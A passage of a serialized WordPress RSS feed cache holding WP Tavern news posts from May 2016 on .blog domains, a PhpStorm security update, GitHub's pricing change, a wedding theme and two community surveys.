rush.”</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 May 2016 19:23:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:40;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: Automattic to Oversee the Sale and Registration of Top-Level .Blog Domains\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54788\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"http://wptavern.com/automattic-to-oversee-the-sale-and-registration-of-top-level-blog-domains\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2974:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/blogging.jpg\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/blogging.jpg?resize=960%2C521\" alt=\"photo credit: Luis Llerena\" class=\"size-full wp-image-54799\" /></a>photo credit: <a href=\"https://stocksnap.io/photo/3ZHG0XOIT6\">Luis Llerena</a>\n<p>Automattic <a href=\"https://en.blog.wordpress.com/2016/05/12/coming-soon-new-blog-domains-for-websites/\" target=\"_blank\">announced</a> today that it will begin offering top-level .blog domain registration starting in August 2016. The .blog domain extension will be available to both WordPress and non-WordPress sites.</p>\n<p>According to <a href=\"https://twitter.com/markarms\" target=\"_blank\">Mark Armstrong</a>, an Automattic subsidiary is exclusively managing the registration of .blog domains and will be offering it for purchase through WordPress.com and other domain registrars.</p>\n<p>“Automattic subsidiary Knock Knock Whois There LLC, in partnership with the domain company Primer Nivel, won the rights to the .blog domain in 2015 through an auction process overseen by the Internet Corporation for Assigned Names and Numbers (ICANN), the non profit organization that oversees namespaces of the internet,” Armstrong said.</p>\n<p>In an <a href=\"https://ma.tt/2016/05/blog/\" target=\"_blank\">announcement</a> on his blog, Automattic CEO Matt Mullenweg said they used the Knock Knock Whois There LLC company name to “stay stealth while in the bidding process,” which closed around $19 million.</p>\n<p>Although WordPress.com is currently providing the registration information site at <a href=\"https://dotblog.wordpress.com/\" target=\"_blank\">dotblog.wordpress.com</a>, Armstrong said that the company is using <a href=\"http://www.nominet.uk/\" target=\"_blank\">Nominet</a> (the backend registry provider for .UK) to provide the technical infrastructure for managing the domain extension.</p>\n<p>Registration for .blog domains will be offered in a phased approach during the second half of 2016, according to the following estimated timeframe:</p>\n<ul>\n<li><strong>Sunrise (August):</strong> Trademark owners will be able to register .blog domains associated with their brands</li>\n<li><strong>Landrush (October):</strong> Before .blog becomes available to the public, domains may be registered during the landrush period on an application basis.</li>\n<li><strong>General Availability (November):</strong> Automattic plans to begin offering .blog domains to the general public before the end of the year.</li>\n</ul>\n<p>With the exclusive rights to manage the sale of millions of .blog domains, Automattic has the opportunity to promote WordPress.com as a potential host for new registrants. The company hasn’t finalized the price but Armstrong said it will be “in the standard range for new top-level domains with some premium pricing for higher-value names.”</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 12 May 2016 18:19:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: Critical Vulnerabilities Found in PhpStorm, Immediate Update Advised\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54770\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/critical-vulnerabilities-found-in-phpstorm-immediate-update-advised\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2128:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/09/phpstorm-wp-feature.jpg\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/09/phpstorm-wp-feature.jpg?resize=1025%2C471\" alt=\"phpstorm-wp-feature\" class=\"aligncenter size-full wp-image-30739\" /></a></p>\n<p>JetBrains <a href=\"http://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/\" target=\"_blank\">announced</a> today that it has released a security update for PhpStorm and all of its other IntelliJ-based IDEs due to a set of critical vulnerabilities:</p>\n<blockquote><p>The cross-site request forgery (CSRF) flaw in the IDE’s built-in webserver allowed an attacker to access local file system from a malicious web page without user consent.</p>\n<p>Over-permissive CORS settings allowed attackers to use a malicious website in order to access various internal API endpoints, gain access to data saved by the IDE, and gather various meta-information like IDE version or open a project.</p></blockquote>\n<p>PhpStorm is by far <a href=\"http://www.sitepoint.com/best-php-ide-2014-survey-results/\" target=\"_blank\">the most favored IDE for PHP developers</a>. It’s also widely used among WordPress developers, especially since <a href=\"http://wptavern.com/phpstorm-8-released-with-full-wordpress-support\" target=\"_blank\">version 8 added official support for WordPress</a>.</p>\n<p>The update issued today patches the critical vulnerabilities inside the underlying IntelliJ platform that powers nearly a dozen popular IDEs. Installing the update is as easy as selecting ‘Check for Updates’ inside the IDE. Alternatively, customers can download the most recent version from JetBrains.com and the <a href=\"http://blog.jetbrains.com/blog/2016/05/11/security-update-for-intellij-based-ides-v2016-1-and-older-versions/\" target=\"_blank\">security announcement</a> includes links to download older versions.</p>\n<p>Although the JetBrains security team is not aware of these vulnerabilities having been exploited, immediate update is recommended.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 22:26:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"WPTavern: GitHub Introduces Unlimited Private Repositories, Hikes Prices for Organizations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54746\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:99:\"http://wptavern.com/github-introduces-unlimited-private-repositories-hikes-prices-for-organizations\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7590:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/04/github-octocat.jpg\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/04/github-octocat.jpg?resize=857%2C400\" alt=\"github-octocat\" class=\"aligncenter size-full wp-image-42456\" /></a></p>\n<p>GitHub has been inundated with negative feedback after <a href=\"https://github.com/blog/2164-introducing-unlimited-private-repositories\" target=\"_blank\">announcing a major change to its pricing</a> today. All paid plans now include unlimited private repositories, but there’s a catch. The new pricing structure requires GitHub.com organizations to purchase a seat for each user. At $9 per user/month, collaborating on private repositories is now far more costly than the legacy plans which started at $25/month for 10 repositories and unlimited members.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/github-pricing.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/github-pricing.png?resize=1025%2C392\" alt=\"github-pricing\" class=\"aligncenter size-full wp-image-54756\" /></a></p>\n<p>The change is good news for individual developers with paid accounts, as they are no longer charged on a per-repository basis. However, many owners of organizations are finding the new pricing to be untenable and are actively considering alternatives. For comparison, Bitbucket offers unlimited private repositories and <a href=\"https://bitbucket.org/product/pricing\" target=\"_blank\">charges $1/user/month</a>. Unlimited users caps out at $200/month.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/Krogsgard\">@Krogsgard</a> EDD org alone will go from $25 per month to $592 per month <a href=\"https://twitter.com/github\">@github</a></p>\n<p>— Pippinsplugins (@pippinsplugins) <a href=\"https://twitter.com/pippinsplugins/status/730396802638176257\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p>While unlimited private repositories is an exciting benefit that enables developers to make their code more modular, it isn’t a benefit that every organization needs.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/github\">@github</a> Terrible news. I work on an open-source organization >100 devs. We have 2 private repos for internal projects. $900+ vs $25 really!?</p>\n<p>— João Ventura (@jcnventura) <a href=\"https://twitter.com/jcnventura/status/730319187667759104\">May 11, 2016</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/williamsba\">@williamsba</a> ours jumped to $1,204 :-( <a href=\"https://twitter.com/github\">@github</a></p>\n<p>— Tom Willmot (@tomwillmot) <a href=\"https://twitter.com/tomwillmot/status/730391291691995136\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p><a href=\"https://easydigitaldownloads.com/\" target=\"_blank\">Easy Digital Downloads</a> creator Pippin Williamson <a href=\"http://www.twitlonger.com/show/n_1solvjd\" target=\"_blank\">explained</a> why he is frustrated with what amounts to a 2,276% increase in costs for his organization:</p>\n<blockquote><p>I actually have no problems with the pricing for new organizations. It’s their space and they provide a huge number of valuable tools. It is absolutely worth it.</p>\n<p>The problem I have is the drastic increase for existing customers. It’s largely the principal of increasing a customer’s cost by 2,276% without giving them any additional value.</p>\n<p>The value that Github provides me and my team does not change at all with the new pricing, only what I pay per month.</p></blockquote>\n<p>Samuel “Otto” Wood <a href=\"http://www.twitlonger.com/show/n_1solviv\" target=\"_blank\">contends</a> that GitHub’s $9/user/month is a reasonable price to pay for having all the functionality of GitHub hosted for an organization but that the alternative of building your own is far more economical.</p>\n<blockquote><p>A “private” repo is, you know, private. On your own server. Git is, after all, decentralized. You could plop a normal git repo on any private VPS you like in a matter of under an hour. If you’re collaborating with a small group of like 5 people, then coordination is not really a big deal that I’d pay $45 a month to use GitHub for it. You can use any tooling you like, make any website you like. You could probably reproduce the important parts of GitHub that you need for your private setup using WordPress in like a day or two. </p>\n<p>It just seems to me that any advantages of using GitHub at all seem largely nullified by using private repos. Yes, collaboration and using the same toolset you are used to, I get that. But here you’re falling prey to vendor lock-in once again. You’re used to it, you like it, you’re afraid of change, pay up. Simple. </p>\n<p>The advantage of open source software is the freedom to say “up yours” and build your own version instead. Git is open source. Think about it. A $15 a month VPS could easily fit your needs for both privacy and collaboration.</p></blockquote>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/github\">@github</a> found a way to be more expensive than the datacenter that runs my app. Seriously, what\'s happening at <a href=\"https://twitter.com/github\">@github</a> ???</p>\n<p>— Adilson Carvalho (@lcadilson) <a href=\"https://twitter.com/lcadilson/status/730405070819471361\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p>GitHub has established itself as the de facto code collaboration site by offering free hosting for public, open source repositories. However, the emphasis on “social coding” no longer extends to private repositories as organization owners will have little incentive to add more collaborators under the new pricing structure. It discourages organizations from adding users to be bug reporters or third-party collaborators. Teams and agencies hit hardest by the changes are now examining competitors like Bitbucket and self-hosted GitLab.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\">Today is for <a href=\"https://twitter.com/gitlab\">@gitlab</a> what 2007 was for <a href=\"https://twitter.com/WordPress\">@WordPress</a>. If code is poetry, Gitlab is your library. Own your code like you own your content. ❤️</p>\n<p>— John James Jacoby (@JJJ) <a href=\"https://twitter.com/JJJ/status/730417868047790080\">May 11, 2016</a></p></blockquote>\n<p></p>\n<p>Organization owners will not be forced onto the new pricing plans immediately and GitHub promises to give a year’s notice before mandating a switch to the new plans:</p>\n<blockquote><p>We want everyone to have a plan with unlimited private repositories, but don’t worry—you are welcome to stay on your current plan while you evaluate the new cost structure and understand how to best manage your organization members and their private repository access. And while we’re currently not enforcing a timeline to move, rest assured that you’ll have at least 12 months notice before any mandated change to your plan.</p></blockquote>\n<p>While many individual developers will see lower monthly prices and even prorated credits on their accounts, the exponential cost increase for GitHub’s largest customers may cause a mass exodus to the company’s more affordable competitors. Are you moving your organization off of GitHub? Let us know in the comments.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 19:27:29 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:43;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"WPTavern: Affinity: A Free WordPress Wedding Theme from Automattic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54688\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"http://wptavern.com/affinity-a-free-wordpress-wedding-theme-from-automattic\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3832:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity.png\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity.png?resize=800%2C471\" alt=\"affinity\" class=\"aligncenter size-full wp-image-54691\" /></a></p>\n<p>Affinity is the latest addition to WordPress.com’s small collection of <a href=\"https://wordpress.com/themes/search/wedding/\" target=\"_blank\">themes created specifically for weddings</a>. This highly customizable, elegant theme was designed by <a href=\"http://carolinemoore.net/\" target=\"_blank\">Caroline Moore</a> with weddings and family announcements in mind.</p>\n<p>Affinity is a one-page theme with support for five different panels. Each panel’s content can be assigned in the customizer under Theme Options by selecting a page from a drop-down.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/panel.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/panel.png?resize=660%2C231\" alt=\"panel\" class=\"aligncenter size-full wp-image-54717\" /></a></p>\n<p>With the customizable panel approach users are not locked into providing content for sections they don’t need. Single posts and pages support full screen featured images that, if used as a panel, become the background of that section. Affinity offers the option to set the header image opacity to create better contrast with header text. Users can also enable or disable scrolling on the header and front-page featured images.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-home-page.png\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-home-page.png?resize=200%2C474\" alt=\"affinity-home-page\" class=\"alignright size-full wp-image-54693\" /></a></p>\n<p>Affinity includes support for a sidebar widget area and three optional widget areas in the footer. If widgets are added to the sidebar, the one-column layout becomes a two-column layout. It also has a fullwidth page template for removing the sidebar on select pages.</p>\n<p>The different panels give users ample space for adding photos, links to registries, personal stories, info about the bridal party, and anything else related to the event. Affinity includes a Guestbook page template with a special format for displaying visitors’ comments. Turning the Guestbook on is as easy as setting the page template and making sure that comments are enabled.</p>\n<p>Another unique feature of the theme is its post intro area that displays beneath the headline before the first paragraph. It pulls content from the excerpt field and post authors can use it to capture readers’ attention with a quick summary or highlight.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-post-intro.png\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/affinity-post-intro.png?resize=660%2C328\" alt=\"affinity-post-intro\" class=\"aligncenter size-full wp-image-54729\" /></a></p>\n<p>Check out the <a href=\"https://affinitydemo.wordpress.com/\" target=\"_blank\">live demo</a> to see the theme in action. It shows an example of panels that display quotes, an RSVP form, event details, and an engagement story.</p>\n<p>Since no wedding or family announcement is the same, Affinity’s multi-panel approach offers flexibility for many different types of uses. If you’re creating a wedding website and are not finding enough customization options with a hosted service, this theme makes it quick and easy to set it up with WordPress. It’s not yet available on WordPress.org, but you can download a copy for your self-hosted site for free from the sidebar of its <a href=\"https://wordpress.com/themes/affinity\" target=\"_blank\">homepage on WordPress.com</a>.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 06:52:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:44;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WPTavern: Help WPCampus Gather Data on How Schools and Campuses Use WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54650\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/help-wpcampus-gather-data-on-how-schools-and-campuses-use-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1247:\"<p>The organizers of <a href=\"https://2016.wpcampus.org/\">WPCampus</a> are <a href=\"https://www.surveymonkey.com/r/wpcampus05-2016\">seeking feedback</a> via a survey on how schools and campuses utilize WordPress in their environments. The survey consists of five sections:</p>\n<ul>\n<li>How Do You Use WordPress on Campus</li>\n<li>Site Demographics, Traffic, and Data</li>\n<li>Plugins, Themes, and Features</li>\n<li>Security, Performance, and Hosting</li>\n<li>Your Team Structure & Workflows</li>\n</ul>\n<p>There are a couple of perks for those who fill out the survey. Respondents will receive an anonymized version of the complete data set. Those who complete four or more sections will be entered into a drawing to win a free ticket to the conference and will receive a $5 Starbucks or Amazon Gift card.</p>\n<p>Answer the questions that you know and skip the ones you don’t. The team needs as much data as possible to provide a clearer picture of WordPress’ use in higher education. If you know someone or an organization that uses WordPress in higher education, please <a href=\"https://www.surveymonkey.com/r/wpcampus05-2016\">share the survey</a> with them. The survey closes on May 27th.</p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 03:21:06 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:45;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: What Do You Think of the Recommended Plugins Page in WordPress?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=54437\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:82:\"http://wptavern.com/what-do-you-think-of-the-recommended-plugins-page-in-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3913:\"<p>In late 2014, <a href=\"http://wptavern.com/wordpress-4-1-to-introduce-plugin-recommendations\">WordPress 4.1 added</a> a Recommended Plugins tab that takes into account the plugins you have installed and suggests plugins based on which ones are commonly used together. After nearly a year and a half since it was added, I asked the <a href=\"https://twitter.com/wptavern/status/727578470415532032\">Tavern’s Twitter followers</a> if they have ever installed plugins recommended by WordPress.</p>\n<p>I was surprised to discover that some people don’t know the tab exists.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> There\'s a \"Recommended\" tab?!?</p>\n<p>— Joe Taiabjee (@joetek) <a href=\"https://twitter.com/joetek/status/727581218414407681\">May 3, 2016</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> I\'ve just noticed the Recommended tab. It seems to show those plugins with most Active Installs. Interesting, but a bit \'hidden\'</p>\n<p>— Alejandro Vargas S. (@Alejandro_V_S) <a href=\"https://twitter.com/Alejandro_V_S/status/727836820159930369\">May 4, 2016</a></p></blockquote>\n<p></p>\n<p>Steve Brown says the recommendations are useful.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> yep :) very useful feature indeed</p>\n<p>— Steve Brown (@stevna) <a href=\"https://twitter.com/stevna/status/727681984504287232\">May 4, 2016</a></p></blockquote>\n<p></p>\n<p>Some people view the page as an opportunity for Automattic to advertise its plugins while others don’t trust the recommendations.</p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> I have no needs for the Automattic plugins that are almost only being recommended there</p>\n<p>— Marko Heijnen (@markoheijnen) <a href=\"https://twitter.com/markoheijnen/status/727624592399998976\">May 3, 2016</a></p></blockquote>\n<p></p>\n<blockquote class=\"twitter-tweet\"><p lang=\"en\" dir=\"ltr\"><a href=\"https://twitter.com/wptavern\">@wptavern</a> Once. However 10 of the plugins recommended on page 1 are untested with my version of WP. So wouldnt rely on the recommendations</p>\n<p>— WPin.me (@wp_in) <a href=\"https://twitter.com/wp_in/status/727725233843671040\">May 4, 2016</a></p></blockquote>\n<p></p>\n<p>When I viewed the recommended plugins page in 2014, the results displayed plugins that weren’t updated in years.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/12/RecommendedPluginsTab.png\"><img class=\"size-full wp-image-35318\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/12/RecommendedPluginsTab.png?resize=1025%2C527\" alt=\"Plugins Recommended To Me Based on Data of Sites with Similar Plugins Installed\" /></a>Plugins Recommended To Me Based on Data of Sites with Similar Plugins Installed\n<p>Today, the page displays more relevant results with recently updated plugins. On the first page of results for WP Tavern, only one plugin from Automattic is recommended. The second page of results doesn’t list any plugins authored by Automattic.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/2016RecommendedPlugins.png\"><img class=\"size-full wp-image-54616\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2016/05/2016RecommendedPlugins.png?resize=1025%2C514\" alt=\"Recommended Plugins in 2016\" /></a>Recommended Plugin Results in 2016\n<p>To help determine how useful the recommended plugins page is, I’d like you to take this short survey. Results will be displayed on Tuesday, May 17th. In addition to the survey, you can leave your feedback in the comments.</p>\n<div class=\"pd-embed\" type=\"type\"></div>\n<p></p>\n<div id=\"epoch-width-sniffer\"></div>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 11 May 2016 03:19:37 